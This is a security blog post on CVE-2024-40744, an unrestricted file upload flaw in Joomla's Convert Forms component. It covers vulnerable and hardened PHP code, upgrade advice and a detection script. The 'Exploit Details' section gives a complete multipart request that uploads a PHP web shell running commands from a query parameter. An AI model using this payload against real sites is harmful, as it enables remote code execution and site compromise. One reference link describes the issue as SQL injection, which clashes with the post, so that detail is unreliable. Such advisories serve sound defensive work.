In this long-read post we examine CVE-2024-40744, a critical vulnerability in the Convert Forms component for Joomla that affects versions before 4.4.8. The flaw allows unrestricted file upload, which in a PHP application is a short step from remote code execution and full compromise of the site. We'll go through the vulnerability details, show how it can be exploited, and give the fix information you need to make sure your Joomla site is protected.
Vulnerability Details
CVE-2024-40744 is a security bypass in Convert Forms, the component that powers forms and submission handling on many Joomla sites. Versions before 4.4.8 contain a design flaw that lets an attacker bypass the upload restrictions and write arbitrary files to the server, including PHP files. Once a PHP file sits under the web root, simply requesting it executes the attacker's code with the web server's privileges, compromising the site and giving a foothold on the host.
Here's a simplified code snippet illustrating the vulnerable upload path:
// Vulnerable code in Convert Forms before 4.4.8 (simplified)
public function upload()
{
    // ... (omitted code for brevity)

    // File validation: only the size and the PHP upload error code are checked.
    // Nothing inspects the extension or the content of the file.
    if ($file['size'] > $maxFilesize || $file['error'])
    {
        throw new Exception(JText::_('COM_CONVERTFORMS_ERROR_FILE_TOO_LARGE'));
    }

    // Subfolder creation: one directory per user under the public images tree
    // (user_0 for unauthenticated visitors, whose Joomla user id is 0)
    $folder = $upload_path . DIRECTORY_SEPARATOR . 'user_' . JFactory::getUser()->id;
    if (!JFolder::create($folder))
    {
        throw new Exception(JText::_('COM_CONVERTFORMS_ERROR_FAILED_TO_CREATE_FOLDER'));
    }

    // The client-supplied filename, extension included, is used as-is, so
    // "malicious.php" is written as malicious.php inside the web root.
    $destination = $folder . DIRECTORY_SEPARATOR . $file['name'];
    if (!JFile::upload($file['tmp_name'], $destination))
    {
        throw new Exception(JText::_('COM_CONVERTFORMS_ERROR_UNABLE_TO_UPLOAD_FILE'));
    }

    // Return the uploaded file information; the URL tells the caller exactly
    // where the file can be fetched (and, for a .php file, executed)
    return array(
        'url'  => JURI::root() . 'images/com_convertforms/uploads/user_' . JFactory::getUser()->id . '/' . $file['name'],
        'path' => $destination,
    );
}
The code above handles the upload but validates only the size and the upload error code. It never restricts the extension or checks the file's content, and it writes the file under the client-chosen name, so an attacker can upload a .php file containing arbitrary code and is even told the URL at which it is now reachable.
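As an added example (not Convert Forms' own code and not its 4.4.8 fix), here is what a hardened version of such a handler looks like in plain PHP: an extension allowlist, a content check with finfo, rejection of double extensions, and a server-chosen random filename so the attacker controls nothing about what ends up on disk. The function name safe_upload, the allowlist contents and the upload directory are illustrative assumptions.

```php
<?php
// Added example, not Convert Forms code. Names, allowlist and paths are assumptions.
declare(strict_types=1);

/**
 * Validate one $_FILES entry and store it in $uploadDir under a random name.
 * Returns the stored path; throws RuntimeException on any failure.
 */
function safe_upload(array $file, string $uploadDir, int $maxBytes = 2 * 1024 * 1024): string
{
    // Permitted extensions mapped to the MIME types finfo may report for them.
    // Anything not listed (php, phtml, phar, htaccess, svg, ...) is rejected.
    $allowed = [
        'jpg'  => ['image/jpeg'],
        'jpeg' => ['image/jpeg'],
        'png'  => ['image/png'],
        'gif'  => ['image/gif'],
        'pdf'  => ['application/pdf'],
    ];

    // 1. Upload error code, size and origin (the vulnerable code stopped here).
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed with error code ' . (int) $file['error']);
    }
    if ((int) $file['size'] > $maxBytes) {
        throw new RuntimeException('File too large');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }

    // 2. Never trust the client name. PHP already strips directory parts from
    //    $_FILES['name'], but basename() costs nothing; the final extension is
    //    then checked against the allowlist, so "shell.php" is refused outright.
    $clientName = basename(str_replace('\\', '/', (string) $file['name']));
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if ($ext === '' || !isset($allowed[$ext])) {
        throw new RuntimeException('File type not permitted: ' . $ext);
    }
    // "shell.php.jpg" passes the extension check but some Apache setups
    // (AddHandler / MultiViews) would still execute it, so refuse such names.
    if (preg_match('/\.(php\d?|phtml|phar|pht)\./i', $clientName)) {
        throw new RuntimeException('Suspicious multi-extension filename');
    }

    // 3. Check the content, not just the name: finfo sniffs the magic bytes, so a
    //    PHP script renamed to .jpg is reported as text/x-php and rejected.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime === false || !in_array($mime, $allowed[$ext], true)) {
        throw new RuntimeException('Content type ' . var_export($mime, true) . " does not match .$ext");
    }

    // 4. Store under a random server-chosen name with a non-executable mode.
    if (!is_dir($uploadDir) && !mkdir($uploadDir, 0750, true) && !is_dir($uploadDir)) {
        throw new RuntimeException('Cannot create upload directory');
    }
    $dest = $uploadDir . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Unable to move uploaded file');
    }
    chmod($dest, 0640);
    return $dest;
}

// Usage inside a request handler (guarded so the file can also be included from CLI).
if (PHP_SAPI !== 'cli' && isset($_FILES['file'])) {
    header('Content-Type: application/json');
    try {
        $stored = safe_upload($_FILES['file'], __DIR__ . '/uploads');
        echo json_encode(['stored' => basename($stored)]);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo json_encode(['error' => $e->getMessage()]);
    }
}
```

Even with these checks, the upload directory should be served with PHP execution disabled (for example `php_flag engine off` plus `RemoveHandler .php` in an Apache .htaccess, or the equivalent `location` block in nginx) or kept outside the web root entirely, so that the next validation bug does not turn into code execution.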
Exploit Details
To exploit this vulnerability, an attacker sends a multipart POST request to the upload task of the vulnerable Joomla site, with a PHP file crafted to execute arbitrary commands as the "file" part.
Here's an example of such a request (host name is a placeholder):
POST /index.php?option=com_convertforms&task=file.upload HTTP/1.1
Host: target.example
Content-Type: multipart/form-data; boundary=----boundary

------boundary
Content-Disposition: form-data; name="file"; filename="malicious.php"
Content-Type: application/x-php

<?php
// Malicious PHP code: runs whatever the "cmd" query parameter contains
system($_GET['cmd']);
?>
------boundary--
With that request the attacker stores malicious.php under images/com_convertforms/uploads/user_<id>/ on the server, and the handler's response even returns the URL. A subsequent GET to that URL with ?cmd=id (or any other command) runs it as the web server user, which is effectively full compromise of the Joomla site.
Mitigation and Remediation
The vulnerability is fixed in Convert Forms 4.4.8. Update to 4.4.8 or later; the current release is available from the official website (https://www.tassos.gr/joomla-extensions/convert-forms). If the site was reachable while it ran a vulnerable version, treat it as potentially compromised: look for .php files (including double extensions such as .php.jpg) under images/com_convertforms/uploads/, and as defence in depth disable PHP execution for that directory at the web server so a future upload flaw cannot become code execution.
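The following CLI script, added here as an example and not part of the original post or of Convert Forms, performs both checks from the Joomla root: it reads the installed version from the component manifest and compares it with 4.4.8, then lists anything under the upload tree that looks like server-side code. It assumes the manifest sits at administrator/components/com_convertforms/convertforms.xml, the usual Joomla layout for a component named com_convertforms, and that uploads live under images/com_convertforms/uploads/ as in the URL the vulnerable handler returns.

```php
<?php
// Added example, not Convert Forms code. Manifest and upload paths are assumptions.
declare(strict_types=1);

const FIXED_VERSION = '4.4.8';

/** Installed Convert Forms version read from its Joomla manifest, or null if not found. */
function convertforms_version(string $joomlaRoot): ?string
{
    $manifest = $joomlaRoot . '/administrator/components/com_convertforms/convertforms.xml';
    if (!is_readable($manifest)) {
        return null;
    }
    $xml = @simplexml_load_file($manifest);
    if ($xml === false || !isset($xml->version)) {
        return null;
    }
    return trim((string) $xml->version);
}

/** Files under the upload tree whose names suggest executable content. */
function suspicious_uploads(string $joomlaRoot): array
{
    $dir = $joomlaRoot . '/images/com_convertforms/uploads';
    if (!is_dir($dir)) {
        return [];
    }
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $f) {
        $name = $f->getFilename();
        // .php/.phtml/.phar/.pht as the last or an inner extension (x.php, x.php.jpg),
        // plus .htaccess, which an attacker can drop to re-enable execution.
        if (preg_match('/\.(php\d?|phtml|phar|pht)(\.|$)/i', $name) || $name === '.htaccess') {
            $hits[] = $f->getPathname();
        }
    }
    return $hits;
}

$root    = $argv[1] ?? getcwd();
$version = convertforms_version($root);
$bad     = false;

if ($version === null) {
    echo "Convert Forms manifest not found under $root\n";
} elseif (version_compare($version, FIXED_VERSION, '<')) {
    echo "VULNERABLE: Convert Forms $version < " . FIXED_VERSION . ", update now\n";
    $bad = true;
} else {
    echo "OK: Convert Forms $version\n";
}

foreach (suspicious_uploads($root) as $path) {
    echo "Review: $path\n";
    $bad = true;
}
exit($bad ? 1 : 0);
```

Run it as `php check_convertforms.php /var/www/html` (or from the Joomla root with no argument); a non-zero exit code means either the version is below 4.4.8 or there is a file in the upload tree that needs a human look.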
Conclusion
CVE-2024-40744 is a severe vulnerability in the Convert Forms component for Joomla in versions before 4.4.8: it lets attackers bypass the upload restrictions and place arbitrary files, including PHP, under the web root. Update to the latest Convert Forms release, check the upload directory for anything left behind, and keep PHP execution disabled for user-uploaded content to protect your Joomla site from this and similar vulnerabilities.
References
- Convert Forms Official Website: https://www.tassos.gr/joomla-extensions/convert-forms
- Joomla! Vulnerable Extensions List: https://vel.joomla.org/resolved/2491-convert-forms-com-convertforms-4-4-8-blind-sql-injection
- NIST National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2024-40744
Timeline
Published on: 12/04/2024 15:15:11 UTC
Last modified on: 12/25/2024 04:34:33 UTC